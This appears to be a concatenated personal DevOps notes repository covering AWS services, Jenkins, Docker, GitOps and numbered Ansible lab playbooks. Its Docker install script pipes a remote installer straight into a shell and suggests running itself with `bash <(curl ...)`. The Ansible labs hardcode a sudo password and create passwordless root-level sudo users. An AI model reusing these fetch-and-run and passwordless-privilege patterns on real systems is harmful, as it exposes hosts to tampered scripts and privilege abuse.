(serverless). 6 | | Use Case | Ideal for running large-scale, long-running batch jobs that process data in chunks. | Best for short-lived tasks or microservices that run on-demand in response to events. 7 | | Job Duration | Can handle long-running jobs, from minutes to hours or more. | Limited to 15 minutes per invocation. 8 | | Scaling | Automatically scales compute resources based on job demand. | Automatically scales based on the number of events. 9 | | Resource Management | Requires setting up and managing compute environments (e.g., EC2 instances). | Fully managed, with no need to handle the underlying infrastructure. 10 | | Compute Resources | Uses EC2 instances or Fargate for job execution. | Runs in a fully managed, serverless environment with no need to provision resources. 11 | | Cost Structure | Pay for EC2 instance usage, including spot instances, and job execution duration. | Pay per request and per compute time (duration). 12 | | Event-Driven | Not event-driven; batch jobs are typically scheduled or triggered manually. | Event-driven, triggered by events like HTTP requests, file uploads, or CloudWatch events. 13 | | Complexity | Suited for complex workflows with dependencies, multi-step processes, and large data processing. | Ideal for simple, stateless functions with minimal dependencies. 14 | | State Management | Can manage state over longer job executions using custom setups. | Stateless functions by design; state management must be external (e.g., DynamoDB, S3). 15 | | Languages | Supports multiple languages via custom environments (Python, Java, etc.). | Supports multiple languages out-of-the-box (Node.js, Python, Java, Go, etc.). 16 | | Container Support | Can run jobs inside Docker containers, providing flexibility and consistency. | Supports running functions in containers (via Lambda container images). -------------------------------------------------------------------------------- /AWS/services/lambda.md: -------------------------------------------------------------------------------- 1 | # Lambda 2 | 3 | AWS Lambda is a [serverless](../onboarding/serverless.md) compute service provided by Amazon Web Services (AWS) that lets you run code without provisioning or managing servers. It automatically scales your application by running code in response to events such as changes in data, system state, or user actions. 4 | 5 | | Feature | Description | 6 | | ----| ----| 7 | | Serverless | **No servers to manage**, automatically scales to accommodate workload. 8 | | Event-Driven | Lambda functions are **triggered by events** (e.g., HTTP requests, changes in data, etc.). 9 | | Time Limitations | Functions have a maximum execution time (15 minutes). 10 | | On-Demand Execution | Virtual functions run **only when triggered**, ensuring efficiency and cost savings. 11 | | Auto-Scaling | Lambda **automatically handles scaling** based on incoming requests. 12 | | Multi-Language Support: | Supports **several programming languages** (Node.js, Python, Java, C#, Go, etc.). 13 | | Cost-Effective | **Pay-per-use** model—charged **per request** (\$0.20 per 1 million requests) and **duration** (\$1.00 per 600,000 GB-seconds). 14 | | Cost Efficiency | **Very affordable**, making it highly popular for small and large-scale applications. 15 | | Event Scheduling | Can be triggered by scheduled events like **CRON jobs** (using **CloudWatch Events** or **EventBridge**). 16 | | Container Support | Lambda **supports container images** that implement the **Lambda runtime API** for custom environments. 17 | | ECS/Fargate Preference | For **larger or more complex** containerized applications, AWS **ECS/Fargate** is often preferred over **Lambda container images**. 18 | 19 | > [!NOTE] 20 | > Read [API Gateway](./api-gateway.md) to create serverless apps. 21 | 22 | > [!IMPORTANT] 23 | > A comparison between Lambda and Batch is available [here](./lambda-vs-batch.md). 24 | 25 | --- 26 | 27 | ## CLI 28 | 29 | List Functions 30 | `aws lambda list-functions` 31 | 32 | Invoke a Function 33 | `aws lambda invoke --function-name my-function response.json` 34 | 35 | Update Function Code 36 | `aws lambda update-function-code --function-name my-function --zip-file fileb://function.zip` -------------------------------------------------------------------------------- /AWS/services/lightsail.md: -------------------------------------------------------------------------------- 1 | # Lightsail 2 | Amazon Lightsail is a simplified cloud computing service offered by AWS that provides an easy-to-use interface for deploying and managing Virtual private servers (VPS). 3 | 4 | > [!IMPORTANT] 5 | > Lightsail offers an easy-to-use management console with **simple configuration options**, reducing the complexity of setting up and managing cloud resources ([EC2](./ec2.md), [S3](./s3.md), [ELB](./elb.md), [EBS](./ebs.md), [RDS](./rds.md), etc). 6 | 7 | | Feature | Description| 8 | | --------| -----------| 9 | | Fixed Pricing | Lightsail instances come with a predictable, transparent pricing model. 10 | | Simplified Management | It abstracts many of the underlying AWS services, making it more approachable for developers or small businesses with less experience in cloud infrastructure 11 | 12 | > [!IMPORTANT] 13 | > There is **NOT** **Auto-scaling** option, it has limited integrations with AWS and there is possible to have **high availability** 14 | 15 | **Use Cases:** 16 | - Easily deploy and host websites, blogs, and web applications. 17 | - Ideal for those who need affordable and easy-to-manage cloud infrastructure. 18 | - Set up development environments quickly for small-scale applications or projects. -------------------------------------------------------------------------------- /AWS/services/sns.md: -------------------------------------------------------------------------------- 1 | # Simple Notification Service (SNS) 2 | 3 | Amazon Simple Notification Service (SNS) is a fully managed messaging and notification service that allows you to send messages or notifications to a large number of subscribers or endpoints. 4 | -------------------------------------------------------------------------------- /AWS/services/vpc.md: -------------------------------------------------------------------------------- 1 | # Virtual Private Cloud (VPC) 2 | 3 | --- 4 | 5 | --- 6 | --- 7 | 8 | ## CLI 9 | 10 | List VPCs 11 | `aws ec2 describe-vpcs` 12 | 13 | Create a VPC 14 | `aws ec2 create-vpc --cidr-block 10.0.0.0/16` 15 | 16 | Delete a VPC 17 | `aws ec2 delete-vpc --vpc-id vpc-12345678` 18 | 19 | 20 | -------------------------------------------------------------------------------- /Applications/Wakapi/README.md: -------------------------------------------------------------------------------- 1 | # Wakapi 2 | [Wakapi](https://wakapi.dev/) is an open-source tool designed to track the time you spend coding on various projects in multiple programming languages and beyond. 3 | 4 | Wakapi is an open-source alternative to [wakatime](https://wakatime.com/) that can run on-premises as a self-hosted solution. 5 | 6 | ## Usage 7 | 8 | 1. Run Wakapi on one of your devices, e.g. using [Docker](https://github.com/CSpyridakis/dockerfiles/blob/main/wakapi/docker-compose.yml). 9 | 2. Οpen VSCode and download the Wakatime extension. 10 | We are going to use the Wakatime extension. Ηowever, we'll log into our server instead of the remote server. 11 | 3. Update the `Wakatime` configuration file `~/.wakatime.cfg` like this: 12 | ``` 13 | [settings] 14 | api_url = https:///api 15 | api_key = 16 | 17 | status_bar_enabled = true 18 | disabled = false 19 | status_bar_coding_activity = true 20 | debug = false 21 | ``` -------------------------------------------------------------------------------- /CI-CD/Jenkins/Jenkinsfile: -------------------------------------------------------------------------------- 1 | pipeline { 2 | /************ AGENT CONFIGURATION ************/ 3 | agent { 4 | // Use 'any' to allow execution on any available Jenkins node 5 | // label 'docker-agent' 6 | agent any 7 | } 8 | 9 | 10 | /************ TOOLS CONFIGURATION ************/ 11 | tools { 12 | 13 | } 14 | 15 | 16 | /************ ENVIRONMENT VARIABLES ************/ 17 | environment { 18 | 19 | } 20 | 21 | 22 | /************ STAGES ************/ 23 | stages { 24 | // 1. Fetch source code 25 | stage('Checkout') { 26 | steps { 27 | git branch: 'main', url: 'https://github.com/your-repo.git' 28 | } 29 | } 30 | 31 | // 2. Build process (replace with actual build command) 32 | stage('Build') { 33 | steps { 34 | sh './build.sh' // Replace with the appropriate build command 35 | } 36 | post { 37 | success { 38 | echo "[Build] Success" 39 | archiveArtifacts artifacts: '**/*.' 40 | } 41 | } 42 | } 43 | 44 | // 3. Run tests (unit tests, integration tests, etc.) 45 | stage('Test') { 46 | steps { 47 | sh './run-tests.sh' // Adjust based on the project 48 | } 49 | post { 50 | success { 51 | echo "[Tests] Success" 52 | } 53 | failure { 54 | echo "[Tests] Failure" 55 | } 56 | } 57 | } 58 | } 59 | 60 | 61 | /************ POST ACTIONS ************/ 62 | post { 63 | always { 64 | echo 'Pipeline execution completed.' 65 | } 66 | success { 67 | echo 'Pipeline succeeded!' 68 | } 69 | failure { 70 | echo 'Pipeline failed!' 71 | } 72 | } 73 | } -------------------------------------------------------------------------------- /CI-CD/Jenkins/installation.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # see https://www.jenkins.io/doc/book/installing/linux/#debianubuntu 3 | 4 | sudo wget -O /usr/share/keyrings/jenkins-keyring.asc \ 5 | https://pkg.jenkins.io/debian-stable/jenkins.io-2023.key 6 | 7 | echo "deb [signed-by=/usr/share/keyrings/jenkins-keyring.asc]" \ 8 | https://pkg.jenkins.io/debian-stable binary/ | sudo tee \ 9 | /etc/apt/sources.list.d/jenkins.list > /dev/null 10 | 11 | sudo apt-get update 12 | sudo apt-get install jenkins -------------------------------------------------------------------------------- /DevOps/NexusOSS.md: -------------------------------------------------------------------------------- 1 | # Nexus OSS (Sonatype Nexus Repository) 2 | 3 | Nexus OSS is a repository manager that stores and manages software artifacts, including dependencies and Docker images. It simplifies versioning, access control, and deployment, acting as a centralized storage for binaries in a development workflow. 4 | 5 | Key features include: 6 | - Artifact management: Stores build artifacts, libraries, and dependencies. 7 | - Docker registry support: Can act as a local repository for Docker images. 8 | - Integration with Maven, Gradle, and other build tools. 9 | - Security policies for access control and governance. -------------------------------------------------------------------------------- /DevOps/SonarQube.md: -------------------------------------------------------------------------------- 1 | # SonarQube 2 | SonarQube is an **open-source** platform for **continuous inspection** of code quality. It helps detect **code smells, bugs, security vulnerabilities, and technical debt** in applications. It supports several programming languages and integrates with **CI/CD** pipelines, making it an essential tool for improving code quality over time. 3 | 4 | It provides features like: 5 | - **Static code analysis** 6 | - **Code coverage** and duplication checks 7 | - **Security vulnerability** detection 8 | - Integration with Git, **Jenkins**, and other tools 9 | 10 | ## Why code analysis 11 | - Follow Best Practices 12 | - Detect vulnerabilities -------------------------------------------------------------------------------- /DevOps/tools/BUILD: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # TODO: After any major update, modify the version number 4 | VERSION="1.7" 5 | 6 | docker build \ 7 | -t cspyridakis/devopstools:latest \ 8 | --build-arg BUILDDATE=$(date +'%Y-%m-%d') \ 9 | --build-arg VERSION=${VERSION} \ 10 | -f devops-tools.Dockerfile . 11 | 12 | docker tag cspyridakis/devopstools:latest cspyridakis/devopstools:${VERSION} 13 | 14 | echo "[Complete]" 15 | echo 16 | echo "A. Run now from the directory of your choice:" 17 | echo "$ docker run -it --rm -v \$(pwd):/app cspyridakis/devopstools:latest" 18 | echo 19 | echo "B. Or if you prefer, you can append this, at the bottom of your .bashrc/.zshrc:" 20 | echo "function devopstools(){" 21 | echo " docker run -it --rm \ " 22 | echo " -v \"\$PWD\":/home/apps/ \ " 23 | echo " -v \"\$HOME/.aws\":/home/devops/.aws:ro \ " 24 | echo " -v \"\$HOME/.ssh\":/home/devops/.ssh:ro \ " 25 | echo " -v /var/run/docker.sock:/var/run/docker.sock \ " 26 | echo " cspyridakis/devopstools:latest" 27 | echo "}" 28 | -------------------------------------------------------------------------------- /Docker/commands.md: -------------------------------------------------------------------------------- 1 | # Docker commands 2 | 3 | ## General 4 | - docker info 5 | - docker ps 6 | 7 | ## Images 8 | - docker build -t {tag-name} -f {Dockerfile} . 9 | - docker inspect {image} 10 | 11 | ## Containers 12 | - docker run -it --rm --name {container-name} {image-name} 13 | - docker top {container} 14 | 15 | ## Docker Compose 16 | - docker compose up/down 17 | - docker compose logs # Display logs 18 | - docker compose ps 19 | - docker compose top 20 | 21 | ## Docker Swarm 22 | - `docker swarm` Handle swarm, initialize it, destroy it, etc 23 | - `docker node` Display nodes, promote nodes or handle nodes in general 24 | - `docker service ` 25 | - `docker stack` 26 | - `docker secret` -------------------------------------------------------------------------------- /Docker/docker-compose-template.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' # Specify the Docker Compose file version 2 | 3 | services: 4 | service1: # Define the first service 5 | image: : # Specify the image to use for this service 6 | ports: 7 | - ":" # Map ports from the host to the container 8 | volumes: 9 | - : # Mount volumes from the host to the container 10 | environment: 11 | ENV_VAR_NAME: # Set environment variables 12 | depends_on: 13 | - service2 # Define dependencies on other services 14 | networks: 15 | - network1 # Specify networks to join 16 | 17 | service2: # Define the second service 18 | build: # Use this to build an image from a Dockerfile 19 | context: 20 | dockerfile: 21 | image: # The name of the image I want to give 22 | command: # Override the default command 23 | 24 | networks: # Define networks 25 | network1: 26 | driver: # Specify network driver 27 | 28 | volumes: # Define volumes 29 | volume1: 30 | external: true # Specify if the volume is external 31 | 32 | configs: # Define configuration files 33 | config1: 34 | file: # Specify the path to the config file 35 | 36 | secrets: # Define secrets for services 37 | secret1: 38 | file: # Specify the path to the secret file -------------------------------------------------------------------------------- /Docker/install-docker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Run it like this: 4 | # bash <(curl -sL https://raw.githubusercontent.com/CSpyridakis/notes/refs/heads/main/Docker/install-docker.sh) 5 | 6 | # Install docker 7 | curl -fsSL get.docker.com -o get-docker.sh && sh get-docker.sh && rm get-docker.sh 8 | 9 | # ------------------------------------------------ 10 | # POST INSTALLATION ACTIONS (see: https://docs.docker.com/engine/install/linux-postinstall/) 11 | 12 | # Create the docker group if not exist 13 | sudo groupadd docker 14 | 15 | # Add your user to the docker group. 16 | sudo usermod -aG docker $USER 17 | 18 | # Activate the changes to groups 19 | newgrp docker 20 | 21 | # Verify that you can run docker commands without sudo 22 | docker run hello-world -------------------------------------------------------------------------------- /GIT/concepts.md: -------------------------------------------------------------------------------- 1 | 2 | ## Localized 3 | ```mermaid 4 | %%{init: {'theme':'neutral'}}%% 5 | graph TB 6 | 7 | subgraph local["Local machine"] 8 | direction LR 9 | subgraph vsc["Version Control System"] 10 | direction LR 11 | ver1["Version 1.1"] 12 | ver2["Version 1.2"] 13 | ver3["Version 1.3"] 14 | end 15 | 16 | File --- vsc 17 | end 18 | ``` 19 | 20 | ## Centralized 21 | ```mermaid 22 | %%{init: {'theme':'neutral'}}%% 23 | graph LR 24 | 25 | subgraph local[" "] 26 | direction LR 27 | local-copy1["Client"] 28 | local-copy2["Client"] 29 | local-copy3["Client"] 30 | end 31 | cental-repo[("Central Repository")] 32 | 33 | local-copy1 <--> | Update | cental-repo 34 | local-copy2 <--> | Update | cental-repo 35 | local-copy3 <--> | Update | cental-repo 36 | ``` 37 | 38 | ## Distributed 39 | ```mermaid 40 | %%{init: {'theme':'neutral'}}%% 41 | graph LR 42 | 43 | subgraph locals[" "] 44 | direction TB 45 | subgraph local1[" "] 46 | direction TB 47 | local-copy1["Client"] 48 | local-repo1[("Repo")] 49 | local-repo1 <--> local-copy1 50 | end 51 | subgraph local2[" "] 52 | direction TB 53 | local-copy2["Client"] 54 | local-repo2[("Repo")] 55 | local-repo2 <--> local-copy2 56 | end 57 | subgraph local3[" "] 58 | direction TB 59 | local-copy3["Client"] 60 | local-repo3[("Repo")] 61 | local-repo3 <--> local-copy3 62 | end 63 | end 64 | 65 | cental-repo[("Central Repository")] 66 | local-copy1 <--> | Update | cental-repo 67 | local-copy2 <--> | Update | cental-repo 68 | local-copy3 <--> | Update | cental-repo 69 | ``` 70 | -------------------------------------------------------------------------------- /GitOps/README.md: -------------------------------------------------------------------------------- 1 | # GitOps 2 | 3 | ## FluxCD vs ArgoCD 4 | ### **Overview** 5 | 6 | | Feature | **FluxCD** | **ArgoCD** | 7 | |----------------------|----------------------------------------|-------------------------------------| 8 | | **Primary Use Case** | Continuous deployment for Kubernetes. | Application-focused GitOps for Kubernetes. | 9 | | **Architecture** | Agent-based, Git-pull model. | Web-based UI and API, Git-pull model. | 10 | | **GitOps Model** | Pushes changes automatically to Kubernetes clusters. | Monitors Git and syncs changes upon request or automatically. | 11 | | **Popularity** | Ideal for CI/CD pipelines and cluster-wide automation. | Widely used for application lifecycle management. | 12 | 13 | --- 14 | 15 | ### **Key Differences** 16 | 17 | | Aspect | **FluxCD** | **ArgoCD** | 18 | |----------------------------|------------------------------------------------|-----------------------------------------------| 19 | | **Installation** | Lightweight; fewer dependencies. | Slightly heavier; includes a UI and API server. | 20 | | **Declarative Support** | Full support for Kubernetes manifests and Helm charts. | Similar support but focused on application-level resources. | 21 | | **User Interface** | CLI-driven and YAML-based configuration. | Rich Web UI for visualization and management. | 22 | | **Multi-Cluster Support** | Supports multi-cluster, but requires Flux instances in each cluster. | Native multi-cluster management. | 23 | | **Sync Mechanism** | Automatically applies changes from Git. | Can be automated or manual with sync buttons in the UI. | 24 | | **Drift Detection** | Detects drift but does not notify; reconciles automatically. | Detects drift and can notify users via UI or webhook. | 25 | | **Custom Resources** | Focused on Kubernetes native resources. | Supports additional resource types like CRDs. | 26 | | **Scalability** | Excellent for managing infrastructure at scale. | Better for managing applications in complex environments. | 27 | | **Notifications** | Requires additional setup (e.g., webhooks). | Built-in notification support for drift and sync events. | 28 | 29 | --- 30 | -------------------------------------------------------------------------------- /Hugo/notes.md: -------------------------------------------------------------------------------- 1 | archetypes: 2 | Default data for new content 3 | 4 | assets: 5 | resources (css/js) 6 | 7 | contect: 8 | Markdowns 9 | 10 | data: 11 | json or xml data 12 | 13 | i18n: 14 | Tables for another languages 15 | 16 | layouts: 17 | Custom themes 18 | 19 | public: 20 | Generated site 21 | 22 | resources: 23 | 24 | static: 25 | 26 | Frontmatter: post metadata 27 | 28 | include sitemap.xml in footer 29 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/1.hello-world/RUNME: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible all -m ping -------------------------------------------------------------------------------- /IaC/Ansible/examples/1.hello-world/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./servers 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/1.hello-world/servers: -------------------------------------------------------------------------------- 1 | [servers] 2 | 3 | # Server 1 IP 4 | 192.168.10.89 ansible_user=ubuntu 5 | 6 | # Server 2 IP 7 | 192.168.10.98 ansible_user=vm 8 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/10.tags/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/10.tags/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # Ping Ubuntu 3 | - hosts: all 4 | pre_tasks: 5 | - name: UBUNTU ping servers 6 | when: ansible_distribution in ["Ubuntu", "Debian"] 7 | tags: ubuntu,ping 8 | ansible.builtin.ping: 9 | 10 | # Ping Fedora 11 | - hosts: all 12 | pre_tasks: 13 | - name: FEDORA ping servers 14 | when: ansible_distribution == "Fedora" 15 | tags: fedora,ping 16 | ansible.builtin.ping: 17 | 18 | # Uptime Ubuntu 19 | - hosts: all 20 | tasks: 21 | - name: UBUNTU Show uptime 22 | when: ansible_distribution in ["Ubuntu", "Debian"] 23 | tags: ubuntu,uptime 24 | ansible.builtin.shell: uptime 25 | register: uptime_output 26 | 27 | - name: UBUNTU Print uptime result 28 | when: ansible_distribution in ["Ubuntu", "Debian"] 29 | tags: ubuntu,uptime 30 | ansible.builtin.debug: 31 | msg: "{{ uptime_output.stdout }}" 32 | 33 | # Uptime Fedora 34 | - hosts: all 35 | tasks: 36 | - name: FEDORA Show uptime 37 | when: ansible_distribution == "Fedora" 38 | tags: fedora,uptime 39 | ansible.builtin.shell: uptime 40 | register: uptime_output 41 | 42 | - name: FEDORA Print uptime result 43 | when: ansible_distribution == "Fedora" 44 | tags: fedora,uptime 45 | ansible.builtin.debug: 46 | msg: "{{ uptime_output.stdout }}" 47 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/10.tags/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 192.168.10.78 6 | 192.168.10.79 7 | 192.168.10.77 8 | 9 | # =================================================================== 10 | 11 | # Vars for all machines that this group have 12 | [servers:vars] 13 | 14 | # User username 15 | ansible_user=vm 16 | 17 | # For sudo privileges password (see also in playbook become: true) 18 | # This is NOTErecommended 19 | ansible_become_pass=vm 20 | 21 | # =================================================================== 22 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/10.tags/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This command should only run ping and fedora related tags 4 | ansible-playbook --tags "ping,fedora" dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/copy-and-extract-zip-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | become: true 4 | tasks: 5 | 6 | # Task 1 7 | - name: Copy file to servers 8 | copy: 9 | # Even though this file is located in the files/ dir only the filename is used 10 | # this is because the files/ dir is assumed 11 | src: dummy_folder.zip 12 | dest: /home/vm/dummy_folder.zip 13 | owner: vm 14 | group: vm 15 | mode: 0644 16 | 17 | # Task 2 18 | - name: Install zip 19 | package: 20 | update_cache: yes # Combine cache update with the installation 21 | name: 22 | - zip 23 | state: latest 24 | 25 | # Task 3 26 | - name: Unzip dir 27 | unarchive: 28 | src: /home/vm/dummy_folder.zip 29 | dest: /home/vm/ 30 | remote_src: true # <-- This tells Ansible the file is already on the remote 31 | # If we do not include it, we can also use a URL directly 32 | owner: vm 33 | group: vm 34 | mode: 0755 35 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/copy-file-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | tasks: 4 | - name: Copy file to servers 5 | copy: 6 | # Even though this file is located in the files/ dir only the filename is used 7 | # this is because the files/ dir is assumed 8 | src: dummy_file.txt 9 | dest: /home/vm/dummy_file.txt 10 | owner: vm 11 | group: vm 12 | mode: 0644 13 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/files/dummy_file.txt: -------------------------------------------------------------------------------- 1 | This is a dummy file that will be copied on each host 2 | 3 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/files/dummy_folder.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CSpyridakis/notes/a51682b5510bc694537a0e1f12914f36d2a3a2a2/IaC/Ansible/examples/11.files/files/dummy_folder.zip -------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 192.168.10.78 6 | 192.168.10.79 7 | 192.168.10.77 8 | 9 | # =================================================================== 10 | 11 | # Vars for all machines that this group have 12 | [servers:vars] 13 | 14 | # User username 15 | ansible_user=vm 16 | 17 | # For sudo privileges password (see also in playbook become: true) 18 | # This is NOTErecommended 19 | ansible_become_pass=vm 20 | 21 | # =================================================================== 22 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook copy-file-playbook.yml 4 | 5 | echo ================================================================ 6 | 7 | ansible-playbook copy-and-extract-zip-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/12.services/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/12.services/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 192.168.10.78 6 | 192.168.10.79 7 | 192.168.10.77 8 | 9 | # =================================================================== 10 | 11 | # Vars for all machines that this group have 12 | [servers:vars] 13 | 14 | # User username 15 | ansible_user=vm 16 | 17 | # For sudo privileges password (see also in playbook become: true) 18 | # This is NOTErecommended 19 | ansible_become_pass=vm 20 | 21 | # =================================================================== 22 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/12.services/playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # Installation 3 | - hosts: all 4 | become: true 5 | pre_tasks: 6 | - name: Install apache2 (Ubuntu) 7 | when: ansible_distribution == "Ubuntu" 8 | apt: 9 | update_cache: true 10 | name: 11 | - apache2 12 | state: latest 13 | 14 | - name: Install httpd (Fedora) 15 | when: ansible_distribution == "Fedora" 16 | dnf: 17 | update_cache: true 18 | name: 19 | - httpd 20 | state: latest 21 | 22 | # Actual service handling 23 | - hosts: all 24 | become: true 25 | tasks: 26 | - name: Start apache2 service (Ubuntu) 27 | when: ansible_distribution == "Ubuntu" 28 | service: 29 | name: apache2 30 | state: started 31 | 32 | - name: Start httpd service (Fedora) 33 | when: ansible_distribution == "Fedora" 34 | service: 35 | name: httpd 36 | state: started 37 | enabled: yes -------------------------------------------------------------------------------- /IaC/Ansible/examples/12.services/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook playbook.yml 4 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/13.users/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/13.users/files/sudoer_superuser: -------------------------------------------------------------------------------- 1 | superuser ALL=(ALL) NOPASSWD: ALL 2 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/13.users/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 192.168.10.78 6 | 192.168.10.79 7 | 192.168.10.77 8 | 9 | # =================================================================== 10 | 11 | # Vars for all machines that this group have 12 | [servers:vars] 13 | 14 | # User username 15 | ansible_user=vm 16 | 17 | # For sudo privileges password (see also in playbook become: true) 18 | # This is NOTErecommended 19 | ansible_become_pass=vm 20 | 21 | # =================================================================== 22 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/13.users/playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | become: true 4 | tasks: 5 | - name: Create a new user 6 | user: 7 | name: superuser 8 | groups: root 9 | 10 | - name: Add sudoers file for user 11 | copy: 12 | src: sudoer_superuser 13 | dest: /etc/sudoers.d/superuser 14 | owner: root 15 | group: root 16 | mode: 0440 17 | 18 | - name: Create a new user 19 | user: 20 | name: anotheruser 21 | groups: root 22 | 23 | - name: Add sudo privileges to user with password prompt 24 | lineinfile: 25 | path: /etc/sudoers.d/anotheruser 26 | line: "anotheruser ALL=(ALL) ALL" 27 | create: yes 28 | mode: '0440' -------------------------------------------------------------------------------- /IaC/Ansible/examples/13.users/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook playbook.yml 4 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/14.create-sudo-user-and-remove-become/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | # inventory = ./hosts 3 | private_key_file = ~/.ssh/ansible 4 | interpreter_python = auto_silent 5 | 6 | # This is needed to become sudo (see bootstrap.yml) 7 | # remote_user = mrmachine -------------------------------------------------------------------------------- /IaC/Ansible/examples/14.create-sudo-user-and-remove-become/bootstrap.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | become: true 4 | pre_tasks: 5 | # ======================================================== 6 | # Make sure that the system has all updates 7 | - name: Update packages (Debian) 8 | when: ansible_distribution in ["Ubuntu", "Debian"] 9 | apt: 10 | update_cache: yes 11 | 12 | - name: Update packages (Red Hat) 13 | when: ansible_distribution in ["Fedora", "CentOS"] 14 | dnf: 15 | update_cache: yes 16 | # ======================================================== 17 | 18 | 19 | # ======================================================== 20 | # Create sudo user 21 | - name: Create sudo user that will handle operations 22 | user: 23 | name: mrmachine2 24 | groups: root 25 | 26 | - name: Add sudo privileges to user with password prompt 27 | lineinfile: 28 | path: /etc/sudoers.d/mrmachine2 29 | line: "mrmachine2 ALL=(ALL) NOPASSWD:ALL" 30 | create: yes 31 | mode: '0440' 32 | 33 | - name: Add SSH key for user 34 | authorized_key: 35 | user: mrmachine2 36 | key: "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPpCBoxrn+mROgjyVxRTxmH76gLwPCdkkcYbKjFHEswC ansible" 37 | 38 | # ======================================================== -------------------------------------------------------------------------------- /IaC/Ansible/examples/14.create-sudo-user-and-remove-become/hosts-bootstrap: -------------------------------------------------------------------------------- 1 | [servers] 2 | 192.168.10.78 3 | 192.168.10.79 4 | 192.168.10.77 5 | 6 | [servers:vars] 7 | # This is needed to become sudo (see bootstrap.yml) 8 | ansible_user = vm 9 | 10 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/14.create-sudo-user-and-remove-become/hosts-normal: -------------------------------------------------------------------------------- 1 | [servers] 2 | 192.168.10.78 3 | 192.168.10.79 4 | 192.168.10.77 5 | 6 | [servers:vars] 7 | ansible_user = mrmachine2 8 | 9 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/14.create-sudo-user-and-remove-become/playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | become: true 4 | tasks: 5 | 6 | # Keep this play here, because you may need in the future to remove or update your key 7 | - name: Add SSH key for user 8 | authorized_key: 9 | user: mrmachine2 10 | key: "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPpCBoxrn+mROgjyVxRTxmH76gLwPCdkkcYbKjFHEswC ansible" 11 | 12 | # 13 | - name: Install packages 14 | package: 15 | update_cache: yes 16 | name: 17 | - figlet -------------------------------------------------------------------------------- /IaC/Ansible/examples/14.create-sudo-user-and-remove-become/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook -i hosts-bootstrap --ask-become-pass bootstrap.yml 4 | ansible-playbook -i hosts-normal playbook.yml 5 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/README.md: -------------------------------------------------------------------------------- 1 | # Roles 2 | 3 | Taskbooks exist in each role 4 | 5 | 6 | ``` 7 | roles 8 | ├── 9 | | └── tasks 10 | | └── main.yml 11 | └── 12 | ├── files 13 | | └── some-file 14 | └── tasks 15 | └── main.yml 16 | ``` -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/ansible.cfg: 